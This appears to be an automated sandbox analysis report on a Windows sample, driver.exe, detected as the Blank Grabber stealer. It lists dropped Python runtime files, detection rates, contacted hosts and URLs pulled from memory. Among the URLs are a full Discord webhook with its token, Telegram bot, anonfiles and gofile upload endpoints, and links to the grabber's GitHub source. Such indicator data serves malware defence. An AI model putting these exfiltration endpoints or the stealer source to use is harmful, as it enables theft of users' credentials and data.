              SourceDetectionScannerLabelLink
              driver.exe44%VirustotalBrowse
              driver.exe37%ReversingLabsWin32.Exploit.BlankGrabber
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\_MEI57082\VCRUNTIME140.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\VCRUNTIME140.dll0%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\_MEI57082\_bz2.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\_bz2.pyd1%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\_MEI57082\_ctypes.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\_ctypes.pyd1%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\_MEI57082\_decimal.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\_hashlib.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\_lzma.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\_queue.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\_socket.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\_sqlite3.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\_ssl.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-namedpipe-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-processenvironment-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-processthreads-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-processthreads-l1-1-1.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-profile-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-rtlsupport-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-string-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-synch-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-synch-l1-2-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-sysinfo-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-timezone-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-util-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-conio-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-convert-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-environment-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-filesystem-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-heap-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-locale-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-math-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-process-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-runtime-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-stdio-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-string-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-time-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-utility-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\libcrypto-3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\libffi-8.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\libssl-3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\python313.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\select.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI57082\sqlite3.dll0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              NameIPActiveMaliciousAntivirus DetectionReputation
              discord.com
              162.159.137.232
              truefalse
                high
                ip-api.com
                208.95.112.1
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://discord.com/api/webhooks/1326920011201118251/xRN_dhCbCT8HeZRae0xJk1yw1sh06GaK4mq7ylVag5fFfCbHC0_LWfgjquGILOcXtJ2Vfalse
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtabdriver.exe, 00000002.00000003.2334802815.000001C0EE22F000.00000004.00000020.00020000.00000000.sdmpfalse
                      https://github.com/Blank-c/BlankOBFdriver.exe, 00000002.00000003.2075105413.000001C0EE390000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2075481940.000001C0EE09C000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2075373068.000001C0EE044000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2075977793.000001C0EE0A3000.00000004.00000020.00020000.00000000.sdmpfalse
                        https://www.avito.ru/driver.exe, 00000002.00000002.2442424891.000001C0EE7D4000.00000004.00001000.00020000.00000000.sdmpfalse
                          https://duckduckgo.com/ac/?q=driver.exe, 00000002.00000003.2334802815.000001C0EE22F000.00000004.00000020.00020000.00000000.sdmpfalse
                            https://api.telegram.org/botdriver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmpfalse
                              https://github.com/Blank-c/Blank-Grabberidriver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmpfalse
                                http://crl.microsoftpowershell.exe, 0000002F.00000002.2321765178.0000028FF8040000.00000004.00000020.00020000.00000000.sdmpfalse
                                  https://www.ctrip.com/driver.exe, 00000002.00000003.2329743274.000001C0EEED4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpfalse
                                    http://www.microsoft.copowershell.exe, 0000002F.00000002.2315796197.0000028FF5F66000.00000004.00000020.00020000.00000000.sdmpfalse
                                      https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000030.00000003.2157180555.000002106B800000.00000004.00000800.00020000.00000000.sdmpfalse
                                        https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#driver.exe, 00000002.00000002.2437809693.000001C0EBD9A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          https://www.leboncoin.fr/driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpfalse
                                            https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-filedriver.exe, 00000002.00000003.2149672861.000001C0EE151000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE152000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2435979821.000001C0EE152000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2188298866.000001C0EE14B000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335408296.000001C0EE14B000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2434711716.000001C0EE152000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE289000.00000004.00000020.00020000.00000000.sdmpfalse
                                              https://tools.ietf.org/html/rfc2388#section-4.4driver.exe, 00000002.00000003.2435146578.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2189780430.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335486016.000001C0EE0AE000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2150956098.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64driver.exe, 00000002.00000002.2438725713.000001C0ED950000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  https://weibo.com/driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    https://api.anonfiles.com/uploaddriver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      https://packaging.python.org/en/latest/specifications/entry-points/#file-formatdriver.exe, 00000002.00000003.2149672861.000001C0EE151000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE152000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2435979821.000001C0EE152000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2188298866.000001C0EE14B000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335408296.000001C0EE14B000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2434711716.000001C0EE152000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE289000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        https://www.msn.comdriver.exe, 00000002.00000002.2445265789.000001C0EF768000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          https://nuget.org/nuget.exepowershell.exe, 0000000E.00000002.2243088797.000001A9C5C53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2310314643.0000028F901BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2261891481.0000028F8196B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2310314643.0000028F9007A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            https://discord.com/api/v9/users/driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963driver.exe, 00000002.00000002.2441846690.000001C0EE490000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                http://cacerts.digidriver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  https://github.com/Blank-c/Blank-Grabberr#driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    https://peps.python.org/pep-0205/driver.exe, 00000002.00000003.2065257439.000001C0ED951000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      https://www.reddit.com/driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000E.00000002.2214718488.000001A9B5BE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2261891481.0000028F80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenamedriver.exe, 00000002.00000002.2438725713.000001C0ED950000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2438237323.000001C0ED6C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxydriver.exe, 00000002.00000002.2441997627.000001C0EE590000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688driver.exe, 00000002.00000002.2438237323.000001C0ED744000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                https://www.ebay.co.uk/driver.exe, 00000002.00000003.2329743274.000001C0EEED4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000002F.00000002.2261891481.0000028F8022A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000E.00000002.2214718488.000001A9B5E0A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      https://www.ebay.de/driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000002F.00000002.2261891481.0000028F8022A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_codedriver.exe, 00000002.00000002.2438237323.000001C0ED6C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            https://go.micropowershell.exe, 0000002F.00000002.2261891481.0000028F80ED7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerdriver.exe, 00000002.00000002.2437809693.000001C0EBD9A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                https://www.amazon.com/driver.exe, 00000002.00000003.2329743274.000001C0EEED4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  https://github.com/python/cpython/issues/86361.driver.exe, 00000002.00000003.2435146578.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2189780430.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335486016.000001C0EE0AE000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2438725713.000001C0ED9B7000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2079997123.000001C0EE0D4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2150956098.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2078386891.000001C0EE0E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    https://contoso.com/Iconpowershell.exe, 0000002F.00000002.2310314643.0000028F9007A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=driver.exe, 00000002.00000003.2334802815.000001C0EE22F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        https://httpbin.org/driver.exe, 00000002.00000003.2126069421.000001C0EE289000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          http://crl.ver)svchost.exe, 00000030.00000002.3296597335.000002106B600000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sdriver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_moduledriver.exe, 00000002.00000002.2438237323.000001C0ED6C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachesdriver.exe, 00000002.00000002.2438237323.000001C0ED6C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  https://www.ecosia.org/newtab/driver.exe, 00000002.00000003.2334802815.000001C0EE22F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brdriver.exe, 00000002.00000003.2103195176.000001C0EE371000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE35F000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2107373008.000001C0EED93000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      https://www.youtube.com/driver.exe, 00000002.00000003.2329743274.000001C0EEED4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        https://allegro.pl/driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          https://github.com/Pester/Pesterpowershell.exe, 0000002F.00000002.2261891481.0000028F8022A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535driver.exe, 00000002.00000003.2435146578.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2334802815.000001C0EE235000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2189780430.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335486016.000001C0EE0AE000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2435979821.000001C0EE237000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE237000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2150956098.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sydriver.exe, 00000002.00000002.2437809693.000001C0EBD9A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                https://MD8.mozilla.org/1/mdriver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadatadriver.exe, 00000002.00000002.2441997627.000001C0EE590000.00000004.00001000.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE289000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    https://www.bbc.co.uk/driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      https://bugzilla.modriver.exe, 00000002.00000002.2442424891.000001C0EE7D8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        https://github.com/python/importlib_metadata/wiki/Development-Methodologydriver.exe, 00000002.00000002.2442254486.000001C0EE6B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          http://tools.ietf.org/html/rfc6125#section-6.4.3driver.exe, 00000002.00000002.2442254486.000001C0EE6B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000E.00000002.2214718488.000001A9B5E0A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLdriver.exe, 00000002.00000003.2335617765.000001C0EE35D000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2191367596.000001C0EE35F000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE35F000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2143041528.000001C0EE35F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                https://google.com/maildriver.exe, 00000002.00000002.2438725713.000001C0ED9B7000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2438981271.000001C0EDBD4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  https://packaging.python.org/specifications/entry-points/driver.exe, 00000002.00000002.2441846690.000001C0EE490000.00000004.00001000.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2441997627.000001C0EE590000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    https://www.python.org/psf/license/)driver.exe, 00000002.00000002.2449988563.00007FF8A8BD9000.00000040.00000001.01000000.00000005.sdmpfalse
                                                                                                                                                      https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pydriver.exe, 00000002.00000002.2437809693.000001C0EBD9A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        https://www.google.com/driver.exe, 00000002.00000003.2329743274.000001C0EEED4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          https://www.iqiyi.com/driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            https://foss.heptapod.net/pypy/pypy/-/issues/3539driver.exe, 00000002.00000002.2441846690.000001C0EE490000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.driver.exe, 00000002.00000002.2439604035.000001C0EDF90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                http://google.com/driver.exe, 00000002.00000002.2438981271.000001C0EDBD4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  http://ocsp.sectigo.com0driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    https://tools.ietf.org/html/rfc7231#section-4.3.6)driver.exe, 00000002.00000003.2079997123.000001C0EE114000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439604035.000001C0EDF90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      https://api.gofile.io/getServerr~driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        https://contoso.com/Licensepowershell.exe, 0000002F.00000002.2310314643.0000028F9007A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://discordapp.com/api/v9/users/driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_sourcedriver.exe, 00000002.00000002.2438237323.000001C0ED744000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                              http://ip-api.com/json/?fields=225545rdriver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=driver.exe, 00000002.00000003.2334802815.000001C0EE22F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_specdriver.exe, 00000002.00000002.2438237323.000001C0ED6C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                    https://github.com/urllib3/urllib3/issues/2920driver.exe, 00000002.00000002.2442254486.000001C0EE6B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                      http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://api.gofile.io/getServerr~rdriver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_datadriver.exe, 00000002.00000002.2438725713.000001C0ED950000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            https://yahoo.com/driver.exe, 00000002.00000002.2438725713.000001C0ED9B7000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2438981271.000001C0EDBD4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              https://account.bellmedia.cdriver.exe, 00000002.00000002.2445265789.000001C0EF73C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6driver.exe, 00000002.00000002.2438981271.000001C0EDCB2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  https://login.microsoftonline.comdriver.exe, 00000002.00000002.2445265789.000001C0EF73C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    http://crl.thawte.com/ThawteTimestampingCA.crl0driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      https://html.spec.whatwg.org/multipage/driver.exe, 00000002.00000003.2334802815.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2434655198.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2440748716.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2149413068.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2187487216.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE289000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        https://www.ifeng.com/driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsdriver.exe, 00000002.00000002.2441997627.000001C0EE590000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            https://www.zhihu.com/driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchdriver.exe, 00000002.00000003.2334802815.000001C0EE22F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                https://www.rfc-editor.org/rfc/rfc8259#section-8.1driver.exe, 00000002.00000003.2435146578.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2189780430.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335486016.000001C0EE0AE000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2150956098.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  https://contoso.com/powershell.exe, 0000002F.00000002.2310314643.0000028F9007A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    https://oneget.orgXpowershell.exe, 0000002F.00000002.2261891481.0000028F81653000.00000004.00000800.00020000.00000000.sdmpfalse
